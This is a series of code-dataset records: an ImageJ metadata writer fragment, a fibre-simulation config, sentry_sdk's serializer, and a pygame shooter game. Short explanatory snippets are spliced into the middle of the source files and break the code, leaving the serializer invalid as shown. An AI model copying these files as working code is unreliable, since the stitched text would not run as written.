bytestring that is to be written to tag\n type: string of length 4 that is used in Imagej to identify the metadata type.\n Cannot be one of the predefined types ('info', 'labl', 'rang', 'luts', 'plot', 'over', 'roi ')\n \"\"\"\n md_type = str(extra_properties.get('type', ''))\n assert len(md_type) == 4\n assert md_type not in ('info', 'labl', 'rang', 'luts', 'plot', 'over', 'roi ')\n\n bytestring = extra_properties.get('bytes')\n if bytestring is None:\n return\n\n extra_properties['bytestring'] = bytes(bytestring)\n extra_properties['type'] = bytes(md_type, 'ASCII')\n 
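_add_data above writes each ROI header field big-endian at its byte offset with struct.pack; a minimal sketch of that offset-addressed packing, plus reading the field back to verify:

import struct

buf = bytearray(8)
# Pack a big-endian signed short (format '>h') at offset 4, as the
# ROI writer does for header fields such as VERSION.
offset, value = 4, 227
buf[offset:offset + struct.calcsize('>h')] = struct.pack('>h', value)
print(struct.unpack_from('>h', buf, offset)[0])  # -> 227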
self._extras.append(extra_properties)","sub_path":"TIFF_IO_ROI/write_ij_metadata.py","file_name":"write_ij_metadata.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293953371","text":"\n# scenario name for log file\nscenario_name = \"no_vectorization\"\n\n# multiple fibers, new_slow_TK_2014_12_08.c this is the same as cuboid example with ModelType 0 (3a, \"MultiPhysStrain\", old tomo mechanics)\n\nConductivity = 3.828 # sigma, conductivity [mS/cm]\nAm = 500.0 # surface area to volume ratio [cm^-1]\nCm = 0.58 # [uF/cm^2] membrane capacitance, (1 = fast twitch, 0.58 = slow twitch)\n# diffusion prefactor = Conductivity/(Am*Cm)\n\n# timing parameters\n# -----------------\nend_time = 10.0 # [ms] end time of the simulation\nstimulation_frequency = 100*1e-3 # [ms^-1] sampling frequency of stimuli in firing_times_file, in stimulations per ms, number before 1e-3 factor is in Hertz.\ndt_0D = 1e-3 # [ms] timestep width of ODEs\ndt_1D = 1e-3 # [ms] timestep width of diffusion\ndt_splitting = dt_1D # [ms] overall timestep width of strang splitting\noutput_timestep = 0.1 # [ms] timestep for output files\nactivation_start_time = 1 # [ms] time when to start checking for stimulation\n\n# other options\nparaview_output = True\n\nn_fibers_x = 1\nn_fibers_y = 1\nn_points_whole_fiber = 1480\n \n# input files\nfiber_file = \"../../../input/cuboid.bin\"\nfiring_times_file = \"../../../input/MU_firing_times_always.txt\"\nfiber_distribution_file = \"../../../input/MU_fibre_distribution_3780.txt\"\ncellml_file = \"../../../input/new_slow_TK_2014_12_08.c\"\n","sub_path":"examples/electrophysiology/fibers/multiple_fibers_cubes_partitioning/variables/compare_to_opencmiss_no_vectorization.py","file_name":"compare_to_opencmiss_no_vectorization.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382145929","text":"import sys\nimport itertools\n\nfrom datetime import datetime\n\nfrom sentry_sdk.utils import (\n AnnotatedValue,\n capture_internal_exception,\n disable_capture_event,\n safe_repr,\n strip_string,\n)\n\nfrom sentry_sdk._compat import text_type, PY2, string_types, number_types, iteritems\n\nfrom sentry_sdk._types import MYPY\n\nif MYPY:\n from types import TracebackType\n\n import sentry_sdk\n\n from typing import Any\n from typing import Dict\n from typing import List\n from typing import Tuple\n from typing import Optional\n from typing import Callable\n from typing import Union\n from typing import ContextManager\n from typing import Type\n\n from sentry_sdk._types import NotImplementedType, Event\n\n ReprProcessor = Callable[[Any, Dict[str, Any]], Union[NotImplementedType, str]]\n Segment = Union[str, int]\n\n\nif PY2:\n # Importing ABCs from collections is deprecated, and will stop working in 3.8\n # https://github.com/python/cpython/blob/master/Lib/collections/__init__.py#L49\n from collections import Mapping, Sequence\nelse:\n # New in 3.3\n # https://docs.python.org/3/library/collections.abc.html\n from collections.abc import Mapping, Sequence\n\nMAX_DATABAG_DEPTH = 5\nMAX_DATABAG_BREADTH = 10\nCYCLE_MARKER = u\"\"\n\n\nglobal_repr_processors = [] # type: List[ReprProcessor]\n\n\ndef add_global_repr_processor(processor):\n # type: (ReprProcessor) -> None\n global_repr_processors.append(processor)\n\n\nclass Memo(object):\n __slots__ = (\"_inner\", \"_objs\")\n\n def __init__(self):\n # type: () -> None\n 
self._inner = {} # type: Dict[int, Any]\n self._objs = [] # type: List[Any]\n\n def memoize(self, obj):\n # type: (Any) -> ContextManager[bool]\n self._objs.append(obj)\n return self\n\n def __enter__(self):\n # type: () -> bool\n obj = self._objs[-1]\n if id(obj) in self._inner:\n return True\n else:\n self._inner[id(obj)] = obj\n return False\n\n def __exit__(\n self,\n ty, # type: Optional[Type[BaseException]]\n value, # type: Optional[BaseException]\n tb, # type: Optional[TracebackType]\n ):\n # type: (...) -> None\n self._inner.pop(id(self._objs.pop()), None)\n\n\ndef serialize(event, **kwargs):\n # type: (Event, **Any) -> Event\n memo = Memo()\n path = [] # type: List[Segment]\n meta_stack = [] # type: List[Dict[str, Any]]\n\n def _annotate(**meta):\n # type: (**Any) -> None\n while len(meta_stack) <= len(path):\n try:\n segment = path[len(meta_stack) - 1]\n node = meta_stack[-1].setdefault(text_type(segment), {})\n except IndexError:\n node = {}\n\n meta_stack.append(node)\n\n meta_stack[-1].setdefault(\"\", {}).update(meta)\n\n def _startswith_path(prefix):\n # type: (Tuple[Optional[Segment], ...]) -> bool\n if len(prefix) > len(path):\n return False\n\n for i, segment in enumerate(prefix):\n if segment is None:\n continue\n\n if path[i] != segment:\n return False\n\n return True\n\n def _serialize_node(\n obj, # type: Any\n max_depth=None, # type: Optional[int]\n max_breadth=None, # type: Optional[int]\n is_databag=None, # type: Optional[bool]\n should_repr_strings=None, # type: Optional[bool]\n segment=None, # type: Optional[Segment]\n ):\n # type: (...) -> Any\n if segment is not None:\n path.append(segment)\n\n try:\n with memo.memoize(obj) as result:\n if result:\n return CYCLE_MARKER\n\n return _serialize_node_impl(\n obj,\n max_depth=max_depth,\n max_breadth=max_breadth,\n is_databag=is_databag,\n should_repr_strings=should_repr_strings,\n )\n except BaseException:\n capture_internal_exception(sys.exc_info())\n\n if is_databag:\n return u\"\"\n\n return None\n finally:\n if segment is not None:\n path.pop()\n del meta_stack[len(path) + 1 :]\n\n def _flatten_annotated(obj):\n # type: (Any) -> Any\n if isinstance(obj, AnnotatedValue):\n _annotate(**obj.metadata)\n obj = obj.value\n return obj\n\n def _serialize_node_impl(\n obj, max_depth, max_breadth, is_databag, should_repr_strings\n ):\n # type: (Any, Optional[int], Optional[int], Optional[bool], Optional[bool]) -> Any\n if not should_repr_strings:\n should_repr_strings = (\n _startswith_path(\n (\"exception\", \"values\", None, \"stacktrace\", \"frames\", None, \"vars\")\n )\n or _startswith_path(\n (\"threads\", \"values\", None, \"stacktrace\", \"frames\", None, \"vars\")\n )\n or _startswith_path((\"stacktrace\", \"frames\", None, \"vars\"))\n )\n\n if obj is None or isinstance(obj, (bool, number_types)):\n return obj if not should_repr_strings else safe_repr(obj)\n\n if isinstance(obj, datetime):\n return (\n text_type(obj.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\"))\n if not should_repr_strings\n else safe_repr(obj)\n )\n\n if not is_databag:\n is_databag = (\n should_repr_strings\n or _startswith_path((\"request\", \"data\"))\n or _startswith_path((\"breadcrumbs\", None))\n or _startswith_path((\"extra\",))\n )\n\n cur_depth = len(path)\n if max_depth is None and max_breadth is None and is_databag:\n max_depth = cur_depth + MAX_DATABAG_DEPTH\n max_breadth = cur_depth + MAX_DATABAG_BREADTH\n\n if max_depth is None:\n remaining_depth = None\n else:\n remaining_depth = max_depth - cur_depth\n\n obj = _flatten_annotated(obj)\n\n 
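Memo above detects reference cycles by object id while the serializer walks the event, returning CYCLE_MARKER instead of recursing forever. A standalone sketch of the same pattern, assuming a simple recursive walker in place of _serialize_node:

class Memo:
    def __init__(self):
        self._seen = {}

    def __contains__(self, obj):
        return id(obj) in self._seen

    def add(self, obj):
        self._seen[id(obj)] = obj  # keep a reference so the id stays valid

    def discard(self, obj):
        self._seen.pop(id(obj), None)

def walk(obj, memo):
    if obj in memo:
        return "<cycle>"  # already on the current path: cut the recursion
    memo.add(obj)
    try:
        if isinstance(obj, list):
            return [walk(x, memo) for x in obj]
        return obj
    finally:
        memo.discard(obj)  # leaving this node: allow it on other branches

a = [1, 2]
a.append(a)  # self-referencing list
print(walk(a, Memo()))  # -> [1, 2, '<cycle>']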
if remaining_depth is not None and remaining_depth <= 0:\n _annotate(rem=[[\"!limit\", \"x\"]])\n if is_databag:\n return _flatten_annotated(strip_string(safe_repr(obj)))\n return None\n\n if global_repr_processors and is_databag:\n hints = {\"memo\": memo, \"remaining_depth\": remaining_depth}\n for processor in global_repr_processors:\n result = processor(obj, hints)\n if result is not NotImplemented:\n return _flatten_annotated(result)\n\n if isinstance(obj, Mapping):\n # Create temporary copy here to avoid calling too much code that\n # might mutate our dictionary while we're still iterating over it.\n if max_breadth is not None and len(obj) >= max_breadth:\n rv_dict = dict(itertools.islice(iteritems(obj), None, max_breadth))\n _annotate(len=len(obj))\n else:\n if type(obj) is dict:\n rv_dict = dict(obj)\n else:\n rv_dict = dict(iteritems(obj))\n\n for k in list(rv_dict):\n str_k = text_type(k)\n v = _serialize_node(\n rv_dict.pop(k),\n max_depth=max_depth,\n max_breadth=max_breadth,\n segment=str_k,\n should_repr_strings=should_repr_strings,\n is_databag=is_databag,\n )\n if v is not None:\n rv_dict[str_k] = v\n\n return rv_dict\n elif not isinstance(obj, string_types) and isinstance(obj, Sequence):\n if max_breadth is not None and len(obj) >= max_breadth:\n rv_list = list(obj)[:max_breadth]\n _annotate(len=len(obj))\n else:\n rv_list = list(obj)\n\n for i in range(len(rv_list)):\n rv_list[i] = _serialize_node(\n rv_list[i],\n max_depth=max_depth,\n max_breadth=max_breadth,\n segment=i,\n should_repr_strings=should_repr_strings,\n is_databag=is_databag,\n )\n\n return rv_list\n\n if should_repr_strings:\n obj = safe_repr(obj)\n else:\n if isinstance(obj, bytes):\n obj = obj.decode(\"utf-8\", \"replace\")\n\n if not isinstance(obj, string_types):\n obj = safe_repr(obj)\n\n return _flatten_annotated(strip_string(obj))\n\n disable_capture_event.set(True)\n try:\n rv = _serialize_node(event, **kwargs)\n if meta_stack and isinstance(rv, dict):\n rv[\"_meta\"] = meta_stack[0]\n return rv\n finally:\n disable_capture_event.set(False)\n\n\ndef partial_serialize(client, data, should_repr_strings=True, is_databag=True):\n # type: (Optional[sentry_sdk.Client], Any, bool, bool) -> Any\n is_recursive = disable_capture_event.get(None)\n if is_recursive:\n return CYCLE_MARKER\n\n if client is not None and client.options[\"_experiments\"].get(\n \"fast_serialize\", False\n ):\n data = serialize(\n data, should_repr_strings=should_repr_strings, is_databag=is_databag\n )\n\n if isinstance(data, dict):\n # TODO: Bring back _meta annotations\n data.pop(\"_meta\", None)\n return data\n\n return data\n","sub_path":"sentry_sdk/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":9666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431724458","text":"import random, sys, math, time\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\nlast_preset = []\r\ngame_height = 800\r\ngame_width = 1400\r\nfps = 60\r\nname = 'Sadistic Stars'\r\nscreen = pygame.display.set_mode((game_width, game_height))\r\nclock = pygame.time.Clock()\r\npygame.display.set_caption(name)\r\nprogramIcon = pygame.image.load('icon.png')\r\npygame.display.set_icon(programIcon)\r\n\r\n\r\n\r\n\r\n#game variables\r\ndef set_variables():\r\n global debugging_mode, game_on, game_height, game_width, fps, name, screen_colour\r\n global events, mouse_x, mouse_y, drift_speed, running, edges, bad_bullets, good_bullets\r\n global good_guys, 
bad_guys, effects, balls, explosions, bullets, map_count, map_image\r\n global waves, wave_done, wave_to_do_list, players_to_make, skin_l, gun_l, controls_l, players_l\r\n global options, wave_count, scrolling_background, tim_stats, lill_tim_stats, lill_tim2_stats, bob_stats\r\n global bob_body_stats, player_stats, explosion_stats, game_ready, game_started, fg, bg, load_stage\r\n global preset, start_cycle, cross_out, which, last_clicked, check_mark, last_clicked2, last_clicked3\r\n global death_counts, cross_out2, progress, wave_timer1, wave_timer2, game_over_timer, sgt, death\r\n global damage, kills, hours, minutes, seconds, wave, counting, time_outs, time_out_time, boss_to_do_list\r\n global boss_tim_stats, bombs, bomb_stats\r\n boss_to_do_list = []\r\n time_out_time = 1\r\n time_outs = []\r\n counting = False\r\n progress = 1\r\n wave = -1\r\n damage = 0\r\n kills = 0\r\n hours = 0\r\n minutes = 0\r\n seconds = 0\r\n death_counts = False\r\n last_clicked = None\r\n last_clicked2 = None\r\n last_clicked3 = None\r\n preset = []\r\n which = 0\r\n load_stage = 1\r\n fg = 250, 240, 230\r\n bg = 5, 5, 5\r\n cross_out = pygame.image.load('cross_out.png')\r\n cross_out2 = pygame.image.load('cross_out2.png')\r\n check_mark = pygame.image.load('check_mark.png')\r\n game_started = False\r\n map_image = pygame.transform.scale(pygame.image.load('stars.png'), (int(pygame.image.load('stars.png').get_width() * 2.3), int(pygame.image.load('stars.png').get_height() * 2.3)))\r\n game_ready = False\r\n debugging_mode = True\r\n game_on = False\r\n screen_colour = (200, 200, 200)\r\n events = []\r\n mouse_x = 0\r\n mouse_y = 0\r\n drift_speed = 2\r\n running = True\r\n edges = [750,0,1365,0]\r\n bad_bullets = []\r\n good_bullets = []\r\n good_guys = []\r\n bad_guys = []\r\n effects = []\r\n bombs = []\r\n balls = []\r\n default_wait_wave = 5\r\n explosions = []\r\n start_cycle = True\r\n # ID : [IMAGE, AIM ANGLE FLUCTUATION, TICKS BETWEEN SHOT, DAMAGE]\r\n bullets = {1 : ['bullet1.png', 3, 10, 8, 3],\r\n 2 : ['bullet2.png', 20, 7, 3, .7],\r\n 3 : ['bullet3.png', 0, 30, 60, 10],\r\n 4 : ['bullet4.png', 40, 7, 120, 2]}\r\n map_count = 0\r\n # ID : [TICKS BETWEEN SPAWN, SECONDS TO WAIT, LILL_TIMS, LILL_TIMS2, TIMS, BOMBS, BOBS]\r\n waves = {1 : [30, 0,0, 0, 0, 0, 0, 'boss_tim'],\r\n 2 : [20, default_wait_wave, 40, 0, 0, 0, 0, None],\r\n 3 : [10, default_wait_wave, 100, 0, 0, 0, 0, None],\r\n 4 : [20, default_wait_wave, 60, 15, 0, 0, 0, None],\r\n 5 : [12, default_wait_wave, 50, 25, 0, 0, 0, None],\r\n 6 : [8, default_wait_wave, 80, 60, 0, 1, 0, None],\r\n 7 : [16, default_wait_wave, 20, 60, 0, 10, 0, None],\r\n 8 : [12, default_wait_wave, 30, 10, 1, 1, 0, None],\r\n 9 : [16, default_wait_wave, 60, 30, 2, 4, 4, None],\r\n 10 : [16, default_wait_wave, 60, 30, 5, 4, 4, None],\r\n 11 : [16, default_wait_wave, 50, 50, 10, 4, 4, None],\r\n 12 : [20, default_wait_wave, 60, 60, 15, 4, 4, 'boss_tim']}\r\n\r\n\r\n wave_done = True\r\n wave_to_do_list = []\r\n players_to_make = []\r\n skin_l = [1,2,3,4]\r\n gun_l = [1,2,3,4]\r\n controls_l = ['wasd', 'arrow', 'ijkl', 'tfgh']\r\n players_l = [1,2,3,4]\r\n options = True\r\n wave_count = 0\r\n scrolling_background = True\r\n\r\n tim_stats = {'image1' : pygame.image.load('tim.png'),\r\n 'image2' : pygame.image.load('tim2.png'),\r\n 'health' : 10,\r\n 'speed' : 1,\r\n 'pitch' : 3,\r\n 'roll' : .025,\r\n 'shoot_rate' : 120,\r\n 'costume_rate' : 10}\r\n\r\n lill_tim_stats = {'image1' : pygame.image.load('lill_tim.png'),\r\n 'image2' : pygame.image.load('lill_tim2.png'),\r\n 
'health' : 3,\r\n 'speed' : 1,\r\n 'pitch' : None,\r\n 'roll' : None,\r\n 'costume_rate' : 10}\r\n bomb_stats = {'image1' : pygame.image.load('mine.png'),\r\n 'image2' : pygame.image.load('mine2.png'),\r\n 'image3' : pygame.image.load('mine3.png'),\r\n 'image4' : pygame.image.load('explosion2.png'),\r\n 'health' : 5,\r\n 'speed' : 1,\r\n 'range' : 200}\r\n \r\n\r\n lill_tim2_stats = {'image1' : pygame.image.load('lill_tim-2.png'),\r\n 'image2' : pygame.image.load('lill_tim2-2.png'),\r\n 'health' : 5,\r\n 'speed' : 1,\r\n 'pitch' : 3,\r\n 'roll' : .025,\r\n 'costume_rate' : 10}\r\n\r\n bob_stats = {'image1' : pygame.image.load('worm_head1.png'),\r\n 'image2' : pygame.image.load('worm_head2.png'),\r\n 'health' : 5,\r\n 'speed' : 3,\r\n 'pitch' : 3,\r\n 'roll' : .010,\r\n 'costume_rate' : 10,\r\n 'distance' : 5,\r\n 'length' : 200}\r\n\r\n bob_body_stats = {'image1' : pygame.image.load('worm_body.png')}\r\n \r\n player_stats = {'speed' : 8,\r\n 'costume_rate' : 10,\r\n 'controls' : {'wasd' : ['w','s','a','d'],\r\n 'tfgh' : ['t','g','f','h'],\r\n 'ijkl' : ['i','k','j','l'],\r\n 'arrow' : ['up','down','left','right']},\r\n 'shotgun_count' : 12,\r\n 'skins' : {1 : [pygame.image.load('player1-1.png'),pygame.image.load('player1-2.png')],\r\n 2 : [pygame.image.load('player2-1.png'),pygame.image.load('player2-2.png')],\r\n 3 : [pygame.image.load('player3-1.png'),pygame.image.load('player3-2.png')],\r\n 4 : [pygame.image.load('player4-1.png'),pygame.image.load('player4-2.png')]}}\r\n\r\n explosion_stats = {'image1' : pygame.image.load('explosion.png'),\r\n 'length' : 15}\r\n boss_tim_stats = {'image1' : pygame.image.load('boss_tim1.png'),\r\n 'image3' : pygame.image.load('progress bar.png'),\r\n 'image4' : pygame.image.load('progress_bar2.png'),\r\n 'image2' : pygame.image.load('boss_tim2.png'),\r\n 'image5' : pygame.image.load('progress_bar3.png'),\r\n 'health' : 1200,\r\n 'costume_rate' : 10,\r\n 'x' : 700,\r\n 'y' : -300,\r\n 'fall_speed' : 1,\r\n 'home' : [700, 100]}\r\n \r\n\r\n #timers\r\n wave_timer1 = count()\r\n wave_timer2 = count()\r\n game_over_timer = count()\r\n sgt = count()\r\n death = count()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n#classes\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass bomb(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n self.health = bomb_stats['health']\r\n self.x = x\r\n self.y = y\r\n self.speed = bomb_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = bomb_stats['image1']\r\n self.image2 = bomb_stats['image2']\r\n self.image3 = bomb_stats['image3']\r\n self.image4 = bomb_stats['image4']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.costume = 0\r\n self.scale = 0\r\n self.triggered = False\r\n self.origin = [x,y]\r\n\r\n def trigger(self):\r\n self.triggered = True\r\n \r\n def boom(self):\r\n if self.d.count_loop(10):\r\n self.costume += 1\r\n if self.costume == 1:\r\n self.chosen_image = self.image2\r\n elif self.costume == 2:\r\n self.chosen_image = self.image3\r\n if self.costume >= 3:\r\n self.chosen_image = self.image3\r\n self.scale += 1\r\n scale_factor = self.scale / 10\r\n new_width = int(self.image4.get_width() * scale_factor)\r\n new_height = int(self.image4.get_height() * scale_factor)\r\n self.chosen_image = pygame.transform.scale(self.image4, (new_width, new_height))\r\n if self.scale == 50:\r\n bombs.remove(self)\r\n kill()\r\n \r\n \r\n\r\n def hit(self, dam):\r\n if self.health <= 0:\r\n self.triggered = True\r\n print('damage %s' % dam)\r\n 
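The enemies below descend on a sinusoidal path: y advances by speed each frame, and x is offset by a cosine of y (pitch sets the amplitude, roll the frequency). A minimal sketch of a few frames of that motion, using the tim values from the stats above:

import math

speed, pitch, roll = 1, 3, 0.025
x, y = 700.0, 0.0
for _ in range(5):
    y += speed
    x += math.cos(y * roll) * pitch  # weaving horizontal drift
    print(round(x, 2), y)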
print(self.health)\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n self.trigger()\r\n\r\n \r\n\r\n def loop(self):\r\n if self.y >= 1000:\r\n wave_to_do_list.append('bomb')\r\n bombs.remove(self)\r\n if self.triggered:\r\n self.boom()\r\n self.y = self.y + self.speed\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass boss_tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n self.health = boss_tim_stats['health']\r\n self.x = boss_tim_stats['x']\r\n self.y = boss_tim_stats['y']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image1 = boss_tim_stats['image1']\r\n self.image2 = boss_tim_stats['image2']\r\n self.chosen_image = self.image1\r\n self.d = count()\r\n self.g = count()\r\n self.c = count()\r\n self.speed = boss_tim_stats['fall_speed']\r\n self.costume_rate = tim_stats['costume_rate']\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.task = 'come'\r\n self.tasks = ['sweep', 'shoot', 'bombs_away', 'summon']#, 'fire_down', 'fire', 'circle']\r\n self.sweep_speed = 1\r\n self.roll = .05\r\n self.pitch = 20\r\n self.homex = (boss_tim_stats['home'])[0]\r\n self.homey = (boss_tim_stats['home'])[1]\r\n self.home_speed = 1\r\n self.rest_time = 240\r\n self.sweeps = True\r\n self.origin = [self.x,self.y]\r\n self.home = False\r\n self.n = count()\r\n self.k = count()\r\n self.bomb = count()\r\n self.bullet_count = 0\r\n self.display = False\r\n self.image3 = pygame.transform.scale(boss_tim_stats['image5'], (int(boss_tim_stats['image5'].get_width() * 2), int(boss_tim_stats['image5'].get_height() * 2)))\r\n self.image4 = pygame.transform.scale(boss_tim_stats['image3'], (int(boss_tim_stats['image3'].get_width() * 2), int(boss_tim_stats['image3'].get_height() * 2)))\r\n self.image5 = pygame.transform.scale(boss_tim_stats['image4'], (int(boss_tim_stats['image4'].get_width() * 2), int(boss_tim_stats['image4'].get_height() * 2)))\r\n self.left = False\r\n self.pivot = False\r\n self.pivot_count = 0\r\n self.sumn = count()\r\n \r\n\r\n def summon(self):\r\n if self.sumn.count(600):\r\n for x in [150, 300, 450, 600, 750, 900, 1050, 1200]:\r\n bad_guys.append(tim(1, x, -100))\r\n if self.sumn.count(1200):\r\n self.new_task()\r\n \r\n\r\n def rest(self):\r\n if self.g.count_loop(10):\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,180))\r\n if self.c.count(self.rest_time):\r\n self.new_task()\r\n\r\n def shoot(self):\r\n if self.bullet_count != 200:\r\n bad_bullets.append(bad_bullet(1,self.x,self.y,random.choice(list(range(90, 270)))))\r\n self.bullet_count += 1\r\n else:\r\n self.new_task()\r\n\r\n \r\n def bombs_away(self):\r\n if self.pivot:\r\n if self.bomb.count_loop(120):\r\n bombs.append(bomb(self.x,self.y))\r\n if self.pivot_count != 4:\r\n if not self.left:\r\n self.x = self.x + 3\r\n if range_(self.x, 1300, 3):\r\n self.left = True\r\n self.pivot_count += 1\r\n else:\r\n self.x = self.x - 3\r\n if range_(self.x, 100, 3):\r\n self.left = False\r\n self.pivot_count += 1\r\n \r\n else:\r\n self.pivot = False\r\n \r\n else:\r\n if self.x != 700:\r\n if self.x > 700:\r\n self.x = self.x - 1\r\n if self.x < 700:\r\n self.x = self.x + 1\r\n else:\r\n self.new_task()\r\n\r\n\r\n def sweep(self):\r\n if self.sweeps:\r\n self.y = self.y + self.sweep_speed\r\n self.x = self.x + ((math.sin((self.y + 51) * self.roll)) * self.pitch)\r\n else:\r\n if self.n.count(1):\r\n self.home = True\r\n if self.home:\r\n if self.go_home():\r\n self.home = 
False\r\n self.new_task()\r\n self.k.reset_timer()\r\n self.n.reset_timer()\r\n self.x = self.homex\r\n self.y = self.homey\r\n if self.y == 700:\r\n self.sweeps = False\r\n\r\n def go_home(self):\r\n xy = glide_to(self.x, self.y, self.homex, self.homey, 2)\r\n self.x = self.x + xy[0]\r\n self.y = self.y + xy[1]\r\n return xy[2]\r\n \r\n\r\n def hit(self, dam):\r\n self.health = self.health - dam\r\n if self.health <= 0:\r\n if self in bad_guys:\r\n bad_guys.remove(self)\r\n kill()\r\n\r\n def come(self):\r\n self.y += self.speed\r\n self.health = boss_tim_stats['health']\r\n if self.y == (boss_tim_stats['home'])[1]:\r\n self.new_task()\r\n self.display = True\r\n\r\n def new_task(self):\r\n if self.task != 'rest':\r\n self.task = 'rest'\r\n self.c.reset_timer()\r\n else:\r\n self.task = random.choice(self.tasks)\r\n self.sweeps = True\r\n self.bullet_count = 0\r\n self.left = random.choice([False, True])\r\n self.pivot = True\r\n self.pivot_count = 0\r\n self.sumn.reset_timer()\r\n\r\n def display_health(self):\r\n print(self.health)\r\n print(boss_tim_stats['health'])\r\n x = 700 - (self.image3.get_width() // 2)\r\n screen.blit(self.image3, (x, 0))\r\n if self.health == boss_tim_stats['health']:\r\n x = 700 - (self.image4.get_width() // 2)\r\n screen.blit(self.image4, (x, 0))\r\n else:\r\n x = 700 - (self.image4.get_width() // 2)\r\n print('done')\r\n scale = (boss_tim_stats['health'] - self.health) / boss_tim_stats['health']\r\n img = pygame.transform.scale(self.image4, ((int(self.image4.get_width() * scale)), int(self.image4.get_height())))\r\n screen.blit(img, (x, 0))\r\n\r\n x = 700 - (self.image5.get_width() // 2)\r\n screen.blit(self.image5, (x, -44))\r\n\r\n \r\n def loop(self):\r\n if self.task == 'come':\r\n self.come()\r\n if self.task == 'sweep':\r\n self.sweep()\r\n if self.task == 'shoot':\r\n self.shoot()\r\n if self.task == 'rest':\r\n self.rest()\r\n if self.task == 'bombs_away':\r\n self.bombs_away()\r\n if self.task == 'summon':\r\n self.summon()\r\n if self.display:\r\n self.display_health()\r\n if self.d.count_loop(self.costume_rate):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n else:\r\n self.chosen_image = self.image1\r\n## if self.g.count_loop(self.shoot_rate):\r\n## bad_bullets.append(bad_bullet(1,self.x + 45,self.y + 80,180))\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass time_out():\r\n def __init__(self, player):\r\n self.old_wave_count = wave_count\r\n self.player = player\r\n self.waves_waited = 0\r\n\r\n def loop(self):\r\n if self.old_wave_count < wave_count:\r\n self.waves_waited += 1\r\n self.old_wave_count = wave_count\r\n if self.waves_waited == time_out_time:\r\n good_guys.append(self.player)\r\n time_outs.remove(self)\r\n if self.player.player_num == 1:\r\n create_text(35, 0, 100, 'P-1: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 2:\r\n create_text(35, 0, 200, 'P-2: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 3:\r\n create_text(35, 0, 300, 'P-3: %s' % (time_out_time - self.waves_waited))\r\n if self.player.player_num == 4:\r\n create_text(35, 0, 400, 'P-4: %s' % (time_out_time - self.waves_waited))\r\n\r\n\r\nclass count():\r\n\r\n def __init__(self):\r\n self.timer = 0\r\n\r\n def count_loop(self, timer):\r\n if self.timer == timer:\r\n self.timer = 0\r\n return True\r\n else:\r\n self.timer = self.timer + 1\r\n\r\n def count(self, 
timer):\r\n if self.timer == timer:\r\n return True\r\n else:\r\n self.timer = self.timer + 1\r\n\r\n def reset_timer(self):\r\n self.timer = 0\r\n\r\n\r\nclass player(pygame.sprite.Sprite):\r\n\r\n #sprite variables\r\n \r\n\r\n def __init__(self, num, skin, cntr, x, y, gun):\r\n self.skins = player_stats['skins']\r\n self.controls = player_stats['controls']\r\n self.image1 = ((self.skins[skin])[0])\r\n self.image2 = ((self.skins[skin])[1])\r\n self.player_num = num\r\n self.x = x\r\n self.y = y\r\n self.player_speed = player_stats['speed']\r\n pygame.sprite.Sprite.__init__(self)\r\n self.chosen_image = self.image1\r\n self.player_controls = cntr\r\n self.d = count()\r\n self.g = count()\r\n self.gun_type = gun\r\n self.gun_rate = (bullets[self.gun_type])[3]\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = [x,y]\r\n \r\n def hit(self):\r\n if self in good_guys:\r\n explosions.append(explosion(self.x, self.y))\r\n good_guys.remove(self)\r\n self.x = 700\r\n self.y = 400\r\n time_outs.append(time_out(self))\r\n\r\n def loop(self):\r\n if not(((self.controls[self.player_controls])[1]) in events and self.y >= edges[0]):\r\n if self.y >= 0:\r\n if game_on:\r\n self.y = self.y - drift_speed\r\n if ((self.controls[self.player_controls])[0]) in events and self.y >= edges[1]:\r\n self.y = self.y - self.player_speed\r\n if ((self.controls[self.player_controls])[1]) in events and self.y <= edges[0]:\r\n self.y = self.y + self.player_speed + drift_speed\r\n if ((self.controls[self.player_controls])[2]) in events and self.x >= edges[3]:\r\n self.x = self.x - self.player_speed\r\n if ((self.controls[self.player_controls])[3]) in events and self.x <= edges[2]:\r\n self.x = self.x + self.player_speed\r\n if self.d.count_loop(player_stats['costume_rate']):\r\n if self.chosen_image == self.image1:\r\n self.chosen_image = self.image2\r\n elif self.chosen_image == self.image2:\r\n self.chosen_image = self.image1\r\n if game_on:\r\n if self.g.count_loop(self.gun_rate):\r\n good_bullets.append(player_bullet(self.gun_type,self.x,self.y))\r\n if self.gun_type == 4:\r\n for x in range(player_stats['shotgun_count'] - 1):\r\n good_bullets.append(player_bullet(self.gun_type,self.x,self.y))\r\n\r\n self.mask = maskFromSurface(self.chosen_image)\r\n self.origin = display(self.chosen_image, self.x, self.y)\r\n\r\n\r\n\r\n\r\n\r\nclass tim(pygame.sprite.Sprite):\r\n\r\n def __init__(self, skin, x, y):\r\n self.health = tim_stats['health']\r\n self.x = 